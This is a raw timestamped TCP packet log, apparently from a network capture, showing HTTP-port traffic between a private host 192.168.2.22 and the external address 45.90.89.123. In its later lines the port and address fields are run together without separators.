Sep 11, 2024 20:22:24.475203037 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.475264072 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.475330114 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.599845886 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.599874973 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.599884033 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.599945068 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.599956989 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.599958897 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.599967957 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.599991083 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.600018024 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.600061893 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.600661993 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.600842953 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.600853920 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.600863934 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.600886106 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.601290941 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.601336002 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.601363897 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.601373911 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.601402044 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.601463079 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.601475000 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.601509094 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.604971886 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.604984045 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.604999065 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.605009079 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.605020046 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.605046034 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.605046034 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.605407000 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.605417967 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.605463028 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.731842041 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.731863976 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.731875896 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.731954098 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.731975079 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.732001066 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732043982 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.732049942 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732063055 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732074976 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732125998 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.732163906 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732177019 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732188940 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732203007 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732218027 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.732247114 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.732645035 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732677937 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732690096 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732723951 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.732831955 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732842922 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.732876062 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.733180046 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871368885 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871396065 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871407986 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871434927 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871448994 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871460915 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871467113 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871525049 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.871525049 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.871525049 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.871566057 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871578932 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871591091 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871637106 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.871753931 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871798992 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871798992 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.871812105 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871844053 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.871923923 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871936083 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871948957 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871962070 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.871970892 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.872000933 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.872066975 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.872078896 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.872092009 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.872127056 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.872736931 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.872757912 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.872770071 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.872781992 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.872805119 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.872867107 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873075962 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873116016 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.873125076 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873137951 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873151064 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873167038 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.873191118 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873228073 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.873296976 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873308897 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873321056 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873333931 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.873334885 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873352051 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.873367071 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.874114037 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.874125004 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.874135971 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.874161959 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.874244928 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.874258041 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.874269962 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.874280930 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.874293089 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.874335051 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:24.962151051 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.962224960 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:24.962269068 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.002793074 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.002806902 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.002821922 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.002834082 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.002863884 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.002896070 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004103899 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004146099 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004158020 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004234076 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004245043 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004255056 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004266977 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004379988 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004379988 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004379988 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004396915 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004406929 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004416943 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004427910 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004440069 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004440069 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004462957 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004543066 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004554987 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004565001 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004591942 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004697084 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004708052 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004717112 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004728079 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004738092 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004743099 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004749060 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004754066 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004762888 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004772902 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004782915 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004787922 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004795074 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.004813910 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004829884 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004847050 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.004947901 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005317926 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005358934 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005369902 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005371094 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.005403996 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.005470991 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005481005 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005491018 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005501032 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005516052 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.005531073 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.005589962 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005600929 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005611897 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.005633116 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.006259918 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.006324053 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.006330013 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.052676916 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.052798986 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.132515907 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132544994 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132555962 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132587910 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132599115 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132608891 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132621050 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132621050 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.132621050 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.132654905 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.132730007 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132740021 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132751942 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132769108 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.132848978 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132858992 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132869959 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132882118 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.132893085 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.132921934 CEST | 49163 | 80 | 192.168.2.22 | 45.90.89.123
Sep 11, 2024 20:22:25.133039951 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
Sep 11, 2024 20:22:25.133049965 CEST | 80 | 49163 | 45.90.89.123 | 192.168.2.22
                                                Sep 11, 2024 20:22:25.133059978 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133069992 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133084059 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133088112 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133099079 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133233070 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133243084 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133251905 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133263111 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133272886 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133280039 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133284092 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133295059 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133304119 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133306980 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133311987 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133320093 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133346081 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133924007 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133969069 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133971930 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133981943 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134023905 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134056091 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134066105 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134074926 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134084940 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134104967 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134119034 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134205103 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134216070 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134224892 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134253025 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134255886 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134270906 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134282112 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134293079 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134301901 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134320021 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134885073 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134928942 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134929895 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134939909 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134969950 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.135041952 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135056019 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135066032 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135077953 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135092974 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.135113001 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.135194063 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135204077 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135212898 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135226011 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135237932 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135241985 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.135262966 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.140595913 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.140661955 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.140736103 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141813040 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141860962 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.141966105 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141976118 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141988039 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.141998053 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142008066 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142008066 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142019033 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142028093 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142035007 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142045975 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142054081 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142055988 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142067909 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142083883 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142096996 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142107010 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142111063 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142118931 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142128944 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142141104 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142151117 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142168045 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142343044 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142353058 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142363071 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142373085 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142384052 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142390966 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142395020 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.142402887 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142431021 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.142443895 CEST804916345.90.89.123192.168.2.22
